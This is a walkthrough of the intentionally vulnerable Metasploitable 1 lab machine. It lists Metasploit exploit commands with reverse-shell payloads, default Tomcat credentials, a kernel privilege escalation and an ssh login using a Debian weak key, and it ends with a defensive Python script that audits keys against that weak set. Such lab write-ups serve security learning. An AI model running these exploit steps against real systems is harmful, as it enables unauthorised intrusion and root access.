Metasploitable: 1 – walkthrough
Metasploitable: 1 surfaced on VulnHub on May 19th, 2010. Created by Metasploit, it can be found at https://www.vulnhub.com/entry/metasploitable-1,28/. It is the first machine in the Metasploitable series. The objective is to get root privileges.
For the attacking machine, I will be using Kali 2017.1.
Once booted, this is what the victim machine will look like:
We start the attack by finding the IP of the victim machine by using the netdiscover command:
Now that we know our target IP, let’s start by scanning the ports and try to get more information about it:
The scan shows us that the following ports are open:
- Port 21 – Running FTP
- Port 22 – Running OpenSSH
- Port 23 – Running Telnet
- Port 25 – Running SMTP
- Port 80 – Running Apache Web server
- Port 139 – Running Samba
- Port 445 – Running Samba
- Port 3306 – Running MySQL
- Port 5432 – Running PostgreSQL
- Port 8009 – Running Apache Jserv
- Port 8180 – Running Apache Tomcat
Upon visiting the web application (on port 80 via http://) we just see a default Test Page:
Looking at the source code does not reveal anything either.
Looking back at the scan results, one particular port catches my eye: port 445, running Samba 3.0.20. Doing some basic research, I found a vulnerability (CVE-2007-2447): http://www.cvedetails.com/cve/cve-2007-2447. Let’s fire up Metasploit and see if that works:
$ use exploit/multi/samba/usermap_script
$ set PAYLOAD cmd/unix/reverse_netcat
And we are root!
Since this took no time at all, I decided to see how many more ways I could find to exploit this machine.
The next thing that caught my eye while looking back at the scan was port 8180 running Tomcat. Checking that in the browser, this is what I found:
While doing some light reading, I came across the following link, https://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_deploy, and thought of giving it a try:
$ use exploit/multi/http/tomcat_mgr_deploy
$ set PAYLOAD java/meterpreter/reverse_tcp
$ set httpusername tomcat
$ set httppassword tomcat
$ set target 0
$ set RPORT 8180
We did get a low privilege shell. Let’s see how we can escalate our privilege!
While looking around, I saw that the kernel is vulnerable to the following exploit: https://www.rapid7.com/db/modules/exploit/linux/local/udev_netlink
Let’s give it a shot:
$ use exploit/linux/local/udev_netlink
And we get root!
Note: Since the default credentials are tomcat:tomcat, you can log in at http://172.16.92.139:8180/admin and play around a bit as well.
Next, I thought of playing around with PostgreSQL. I tried to run a scan, and it came up with a username and password:
$ use auxiliary/scanner/postgres/postgres_login
Moving on, I wanted to do something with the web app. So I brought out my old friend, dirbuster, to reveal the secrets:
TWiki looks interesting. Going to the browser it shows:
Let’s see if Metasploit has anything on it:
Let’s start with this:
We are getting somewhere. Now let’s try a remote PHP code execution exploit we saw earlier:
$ use exploit/unix/webapp/tikiwiki_graph_formula_exec
We do get a limited shell. However, it took a few attempts before the shell was spawned.
Checking its root directory shows us:
Let’s see what ssh has:
Let’s ssh with these credentials:
Note: You’ll need to download the following keys in order to search: https://hdm.io/tools/debian-openssl/ (2048 bit RSA)
In the folder, let’s search for a key:
$ grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w
And now, time to get in!!
$ ssh -i 57c3115d77c56390332dc5c49978627a-5429 email@example.com
And we are root!
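The key lookup above works because the public key in authorized_keys belongs to the known Debian weak-key set, and the same lookup can be run defensively across a host's authorized_keys files. The following is an added example, not part of the original walkthrough: it assumes the archive names each file `<MD5 fingerprint>-<PID>` (as the key file name passed to ssh above suggests), and the function names and sample data are constructed for illustration.

```python
import base64, hashlib

KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256"}

def md5_fingerprint(b64_blob):
    """MD5 fingerprint (hex, no colons) of a public-key blob, or None if invalid."""
    padded = b64_blob + "=" * (-len(b64_blob) % 4)  # tolerate stripped '=' padding
    try:
        return hashlib.md5(base64.b64decode(padded, validate=True)).hexdigest()
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def load_weak_fingerprints(file_names):
    """Assumption: archive files are named '<md5hex>-<pid>' or '<md5hex>-<pid>.pub'."""
    prefixes = (name.split("-", 1)[0].lower() for name in file_names)
    return {p for p in prefixes if len(p) == 32}

def parse_authorized_keys(text):
    """Yield (line_no, key_type, blob), skipping comments and leading options."""
    for line_no, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        for i, field in enumerate(fields[:-1]):
            if field in KEY_TYPES:
                yield line_no, field, fields[i + 1]
                break

def audit(text, weak):
    """Return (line_no, key_type, fingerprint, verdict) for each problem line."""
    findings = []
    for line_no, key_type, blob in parse_authorized_keys(text):
        fp = md5_fingerprint(blob)
        if fp is None or fp in weak:
            findings.append((line_no, key_type, fp, "weak" if fp else "unparseable"))
    return findings

def constructed_blob(seed):  # constructed stand-in for a key blob, not a real key
    raw = b"\x00\x00\x00\x07ssh-rsa" + hashlib.sha256(seed).digest()
    return base64.b64encode(raw).decode()

WEAK, GOOD = constructed_blob(b"weak"), constructed_blob(b"good")
WEAK_SET = load_weak_fingerprints([md5_fingerprint(WEAK) + "-1234.pub"])
SAMPLE = "\n".join([  # constructed authorized_keys content
    "# constructed sample", "ssh-rsa " + GOOD + " alice@example",
    'command="/usr/bin/backup run",no-pty ssh-rsa ' + WEAK.rstrip("=") + " backup@example",
    "ssh-rsa !!!notbase64 broken@example",
])
print(audit(SAMPLE, WEAK_SET))
```

In real use, build the weak set from `os.listdir()` on the extracted key folder and feed each user's authorized_keys file to `audit()`; any "weak" finding means the matching private key is publicly available and the key should be removed and replaced.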